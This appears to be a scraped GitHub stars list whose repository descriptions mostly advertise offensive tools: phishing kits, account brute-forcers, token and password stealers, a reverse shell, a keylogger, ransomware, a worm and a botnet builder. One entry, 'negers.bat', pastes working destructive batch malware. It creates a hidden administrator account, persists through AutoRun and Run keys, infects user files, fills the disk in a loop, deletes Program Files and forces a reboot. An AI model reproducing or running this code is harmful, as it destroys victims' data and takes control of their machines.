TrAshN3w's Stars
PowerShellEmpire/PowerTools
PowerTools is a collection of PowerShell projects with a focus on offensive operations.
evildevill/Devil
Devil is a tool that is basically made for facebook to Hack target accounts , BruteForce Attack , grab friendlist accounts , yahoo chacker , Facbook Friend information gathering tool , auto likes reactions & much more i hope you enjoy this tool i'm not responsible if you use this tool for any illegal purpose
GhostPack/Koh
The Token Stealer
richardsonjf/shellphish
19 Social Media Phishing Pages #phishing #shellphish #phish
tresacton/PasswordStealer
USB / CD / DVD autorun password stealer
dafthack/Check-LocalAdminHash
Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrator. It's useful if you obtain a password hash for a user and want to see where they are local admin on a network. It is essentially a Frankenstein of two of my favorite tools along with some of my own code. It utilizes Kevin Robertson's (@kevin_robertson) Invoke-TheHash project for the credential checking portion. Additionally, the script utilizes modules from PowerView by Will Schroeder (@harmj0y) and Matt Graeber (@mattifestation) to enumerate domain computers to find targets for testing admin access against.
sailay1996/SpoolTrigger
Weaponizing for privileged file writes bugs with PrintNotify Service
lazywinadmin/LazyTS
PowerShell Script (GUI) to manage Terminal Sessions
huntresslabs/evading-autoruns
Slides and reference material from Evading Autoruns presentation at DerbyCon 7 (September 2017)
phackt/Invoke-Recon
"Powershell script assisting with domain enumerating and in finding quick wins" - Basically written while doing the 'Advanced Red Team' lab from pentesteracademy.
apurvsinghgautam/HTTP-Reverse-Shell
An HTTP Reverse Shell in Python
DanMcInerney/Invoke-Cats
Obfuscated Invoke-Mimikatz
jeb-de/BatchLibrary
Library system for windows batch files using batch macros
GuyRoosevelt/Joke.jpg.hta
A cool little "program" made in Visual Basic Script and HTML that disables you computer and never lets you disable it. Main payloads: denial of service, hiding all your user files, changing all you user shortcuts to itself, changing your wallpaper, and blasts Rebecca Black's Friday on loop.
0thm4n3/MCSC-Lab
MCSC Lab containing the Malware, Malware.vbs and Deobfuscator.
a11y-spec/Trojan.vbs.Ethreaum
wangzhenjjcn/Auto_IPsecVPN_InstallBash
AutoRun
duongletrieu/VBScript-Simple-Keylogger
VBScript Simple Keylogger with strLetter.
ashfaqnisar/Gpedit
This contains all the files for installing group policy editor
Magrene/powW
Powershell worm that spreads throughout a domain using winRM
pidor886/negers.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul[/SRC] reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul[/SRC] reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul[/SRC] [SRC]reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F[/SRC] [SRC]del %0[/SRC] [SRC]:x Start mspaint goto x[/SRC] [SRC]copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul[/SRC] [SRC]Echo_inactive_inactive off chcp 1251 net user SUPPORT_388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y[/SRC] [SRC]rundll32 user,disableoemlayer[/SRC] [SRC]Echo_inactive_inactive off%[MrWeb]% if '%1=='In_ goto MrWebin if exist c:\MrWeb.bat goto MrWebru if not exist %0 goto MrWeben find "MrWeb"<%0>c:\MrWeb.bat attrib +h c:\MrWeb.bat :MrWebru for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben :MrWebin if exist %2.bat goto MrWeben type c:\MrWeb.bat>>%2.bat echo start %2>>%2.bat%[MrWeb]% :MrWeben[/SRC] [SRC]Echo_inactive_inactive off%[MrWeb]% if '%1=='In_ goto MrWebin if exist c:\MrWeb.bat goto MrWebru if not exist %0 goto MrWeben find "MrWeb"<%0>c:\MrWeb.bat attrib +h c:\MrWeb.bat :MrWebru for %%g in (*.jpg) do call c:\MrWeb In_ %%g goto MrWeben :MrWebin if exist %2.bat goto MrWeben type c:\MrWeb.bat>>%2.bat echo start %2>>%2.bat%[MrWeb]% :MrWeben[/SRC] [SRC]Echo_inactive_inactive off echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs echo do >> %systemdrive%\windows\system32\rundll32.vbs echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs echo loop >> %systemdrive%\windows\system32\rundll32.vbs start %systemdrive%\windows\system32\rundll32.vbs reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f[/SRC] [SRC]Echo_inactive_inactive off echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs echo do >> %systemdrive%\windows\system32\rundll32.vbs echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs echo loop >> %systemdrive%\windows\system32\rundll32.vbs start %systemdrive%\windows\system32\rundll32.vbs reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f[/SRC] [SRC]Echo_inactive_inactive off Echo Virus Loading Date 13.09.96 If exist c:ski.bat goto abc Copy %0 c:ski.bat Attrib +h c:ski.bat Echo c:ski.bat >>autoexec.bat :abc md PRIDUROK md LUZER md DURAK md LAMER Label E: PRIDUROK assoc .exe=.mp3 del c:Program Files/q Echo VIRUS LOAD shutdown -r -t 1 -c "lol" >nul[/SRC]
bugsysundayTHOT/rpcL0jack
rpc lojack
duongletrieu/CryptoPuma
CryptoPuma. A Light, Simple Batch-HTA Ransomware. ONLY for education purposes.
Gavineo/WB
Windows Bruteforce | Batch File Bruteforce |
jdoexbox360/batch-malware
Malware in batch for al probably fileless?
krash0verflow/byob
Build Your Own Botnet
MEMESCOEP/MalwareScripts
A collection of malware scripts for learning purposes. Written in VBS, Python, C#, Batch, and more.
secvoid/Windows-Privesc
Windows batch privesc script
TheOPSECGuy/PowerView
PowerView PowerShell script
tumble1999/batch-setCursor
